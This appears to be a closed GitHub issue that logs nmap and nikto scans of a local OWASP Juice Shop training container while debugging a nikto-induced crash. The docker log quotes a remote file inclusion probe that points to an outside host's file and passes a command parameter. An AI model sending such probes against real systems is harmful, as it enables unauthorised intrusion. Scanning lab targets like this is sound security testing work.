Closed jelaiw closed 1 year ago
$ docker run --rm jelaiw/kali nmap 172.17.0.2
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-20 00:24 UTC
Nmap scan report for 172.17.0.2
Host is up (0.0000070s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
3000/tcp open ppp
MAC Address: 02:42:AC:11:00:02 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
$ docker inspect -f '{{ .NetworkSettings.IPAddress }}' tender_engelbart
172.17.0.2
Credit to https://stackoverflow.com/questions/17157721/how-to-get-a-docker-containers-ip-address-from-the-host.
$ docker run --rm jelaiw/kali nmap -sC -sV 172.17.0.2
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-20 00:35 UTC
Nmap scan report for 172.17.0.2
Host is up (0.000010s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| X-Content-Type-Options: nosniff
| X-Frame-Options: SAMEORIGIN
| Feature-Policy: payment 'self'
| X-Recruiting: /#/jobs
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Fri, 20 Jan 2023 00:18:17 GMT
| ETag: W/"7c3-185cc8a5c3d"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 1987
| Vary: Accept-Encoding
| Date: Fri, 20 Jan 2023 00:36:09 GMT
| Connection: close
| <!--
| Copyright (c) 2014-2023 Bjoern Kimminich & the OWASP Juice Shop contributors.
| SPDX-License-Identifier: MIT
| --><!DOCTYPE html><html lang="en"><head>
| <meta charset="utf-8">
| <title>OWASP Juice Shop</title>
| <meta name="description" content="Probably the most modern and sophisticated insecure web application">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link id="favicon" rel="icon" type="image/x-icon" href="asset
| HTTPOptions, RTSPRequest:
| HTTP/1.1 204 No Content
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
| Vary: Access-Control-Request-Headers
| Content-Length: 0
| Date: Fri, 20 Jan 2023 00:36:09 GMT
| Connection: close
| Help, NCP:
| HTTP/1.1 400 Bad Request
|_ Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=7%D=1/20%Time=63C9E1F9%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,979,"HTTP/1\.1\x20200\x20OK\r\nAccess-Control-Allow-Origin:\x2
SF:0\*\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20SAMEOR
SF:IGIN\r\nFeature-Policy:\x20payment\x20'self'\r\nX-Recruiting:\x20/#/job
SF:s\r\nAccept-Ranges:\x20bytes\r\nCache-Control:\x20public,\x20max-age=0\
SF:r\nLast-Modified:\x20Fri,\x2020\x20Jan\x202023\x2000:18:17\x20GMT\r\nET
SF:ag:\x20W/\"7c3-185cc8a5c3d\"\r\nContent-Type:\x20text/html;\x20charset=
SF:UTF-8\r\nContent-Length:\x201987\r\nVary:\x20Accept-Encoding\r\nDate:\x
SF:20Fri,\x2020\x20Jan\x202023\x2000:36:09\x20GMT\r\nConnection:\x20close\
SF:r\n\r\n<!--\n\x20\x20~\x20Copyright\x20\(c\)\x202014-2023\x20Bjoern\x20
SF:Kimminich\x20&\x20the\x20OWASP\x20Juice\x20Shop\x20contributors\.\n\x20
SF:\x20~\x20SPDX-License-Identifier:\x20MIT\n\x20\x20--><!DOCTYPE\x20html>
SF:<html\x20lang=\"en\"><head>\n\x20\x20<meta\x20charset=\"utf-8\">\n\x20\
SF:x20<title>OWASP\x20Juice\x20Shop</title>\n\x20\x20<meta\x20name=\"descr
SF:iption\"\x20content=\"Probably\x20the\x20most\x20modern\x20and\x20sophi
SF:sticated\x20insecure\x20web\x20application\">\n\x20\x20<meta\x20name=\"
SF:viewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\x20
SF:\x20<link\x20id=\"favicon\"\x20rel=\"icon\"\x20type=\"image/x-icon\"\x2
SF:0href=\"asset")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnec
SF:tion:\x20close\r\n\r\n")%r(NCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,EA,"HTTP/1\.1\x20204\x20
SF:No\x20Content\r\nAccess-Control-Allow-Origin:\x20\*\r\nAccess-Control-A
SF:llow-Methods:\x20GET,HEAD,PUT,PATCH,POST,DELETE\r\nVary:\x20Access-Cont
SF:rol-Request-Headers\r\nContent-Length:\x200\r\nDate:\x20Fri,\x2020\x20J
SF:an\x202023\x2000:36:09\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPR
SF:equest,EA,"HTTP/1\.1\x20204\x20No\x20Content\r\nAccess-Control-Allow-Or
SF:igin:\x20\*\r\nAccess-Control-Allow-Methods:\x20GET,HEAD,PUT,PATCH,POST
SF:,DELETE\r\nVary:\x20Access-Control-Request-Headers\r\nContent-Length:\x
SF:200\r\nDate:\x20Fri,\x2020\x20Jan\x202023\x2000:36:09\x20GMT\r\nConnect
SF:ion:\x20close\r\n\r\n");
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.06 seconds
Nikto is crashing the latest version (14.4.0) of Juice Shop, so we are backing up to version 14.3.1 to see if that crashes too.
Here's where we get in nikto.
--- SNIP ---
+ /2.tar.lzma: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /172_17_0_2.war: Potentially interesting archive/cert file found.
+ /172_17_0_2.war: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /1721702.pem: Potentially interesting archive/cert file found.
+ /1721702.pem: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /2.egg: Potentially interesting archive/cert file found.
+ /2.egg: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /backup.egg: Potentially interesting archive/cert file found.
+ /backup.egg: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /1721702.jks: Potentially interesting archive/cert file found.
+ /1721702.jks: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /172_17_0_2.tar.lzma: Potentially interesting archive/cert file found.
+ /172_17_0_2.tar.lzma: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /public/: This might be interesting...
+ Scan terminated: 3 error(s) and 268 item(s) reported on remote host
+ End Time: 2023-01-26 02:47:56 (GMT0) (94 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
Here are the docker logs.
--- SNIP ---
Error: Unexpected path: /api.php?t_path_core=http:/cirt.net/rfiinc.txt??&cmd=id
at /juice-shop/build/routes/angular.js:15:18
at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
at /juice-shop/node_modules/express/lib/router/index.js:286:9
at Function.process_params (/juice-shop/node_modules/express/lib/router/index.js:346:12)
at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)
at /juice-shop/build/routes/verify.js:135:5
at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
at /juice-shop/node_modules/express/lib/router/index.js:286:9
at Function.process_params (/juice-shop/node_modules/express/lib/router/index.js:346:12)
at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)
at /juice-shop/build/routes/verify.js:71:5
at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
at /juice-shop/node_modules/express/lib/router/index.js:286:9
at Function.process_params (/juice-shop/node_modules/express/lib/router/index.js:346:12)
at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)
at logger (/juice-shop/node_modules/morgan/index.js:144:5)
at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
at /juice-shop/node_modules/express/lib/router/index.js:286:9
Above unexpected path appears to be a red herring. Visiting that path directly does give the same error, but not a crash.
Notes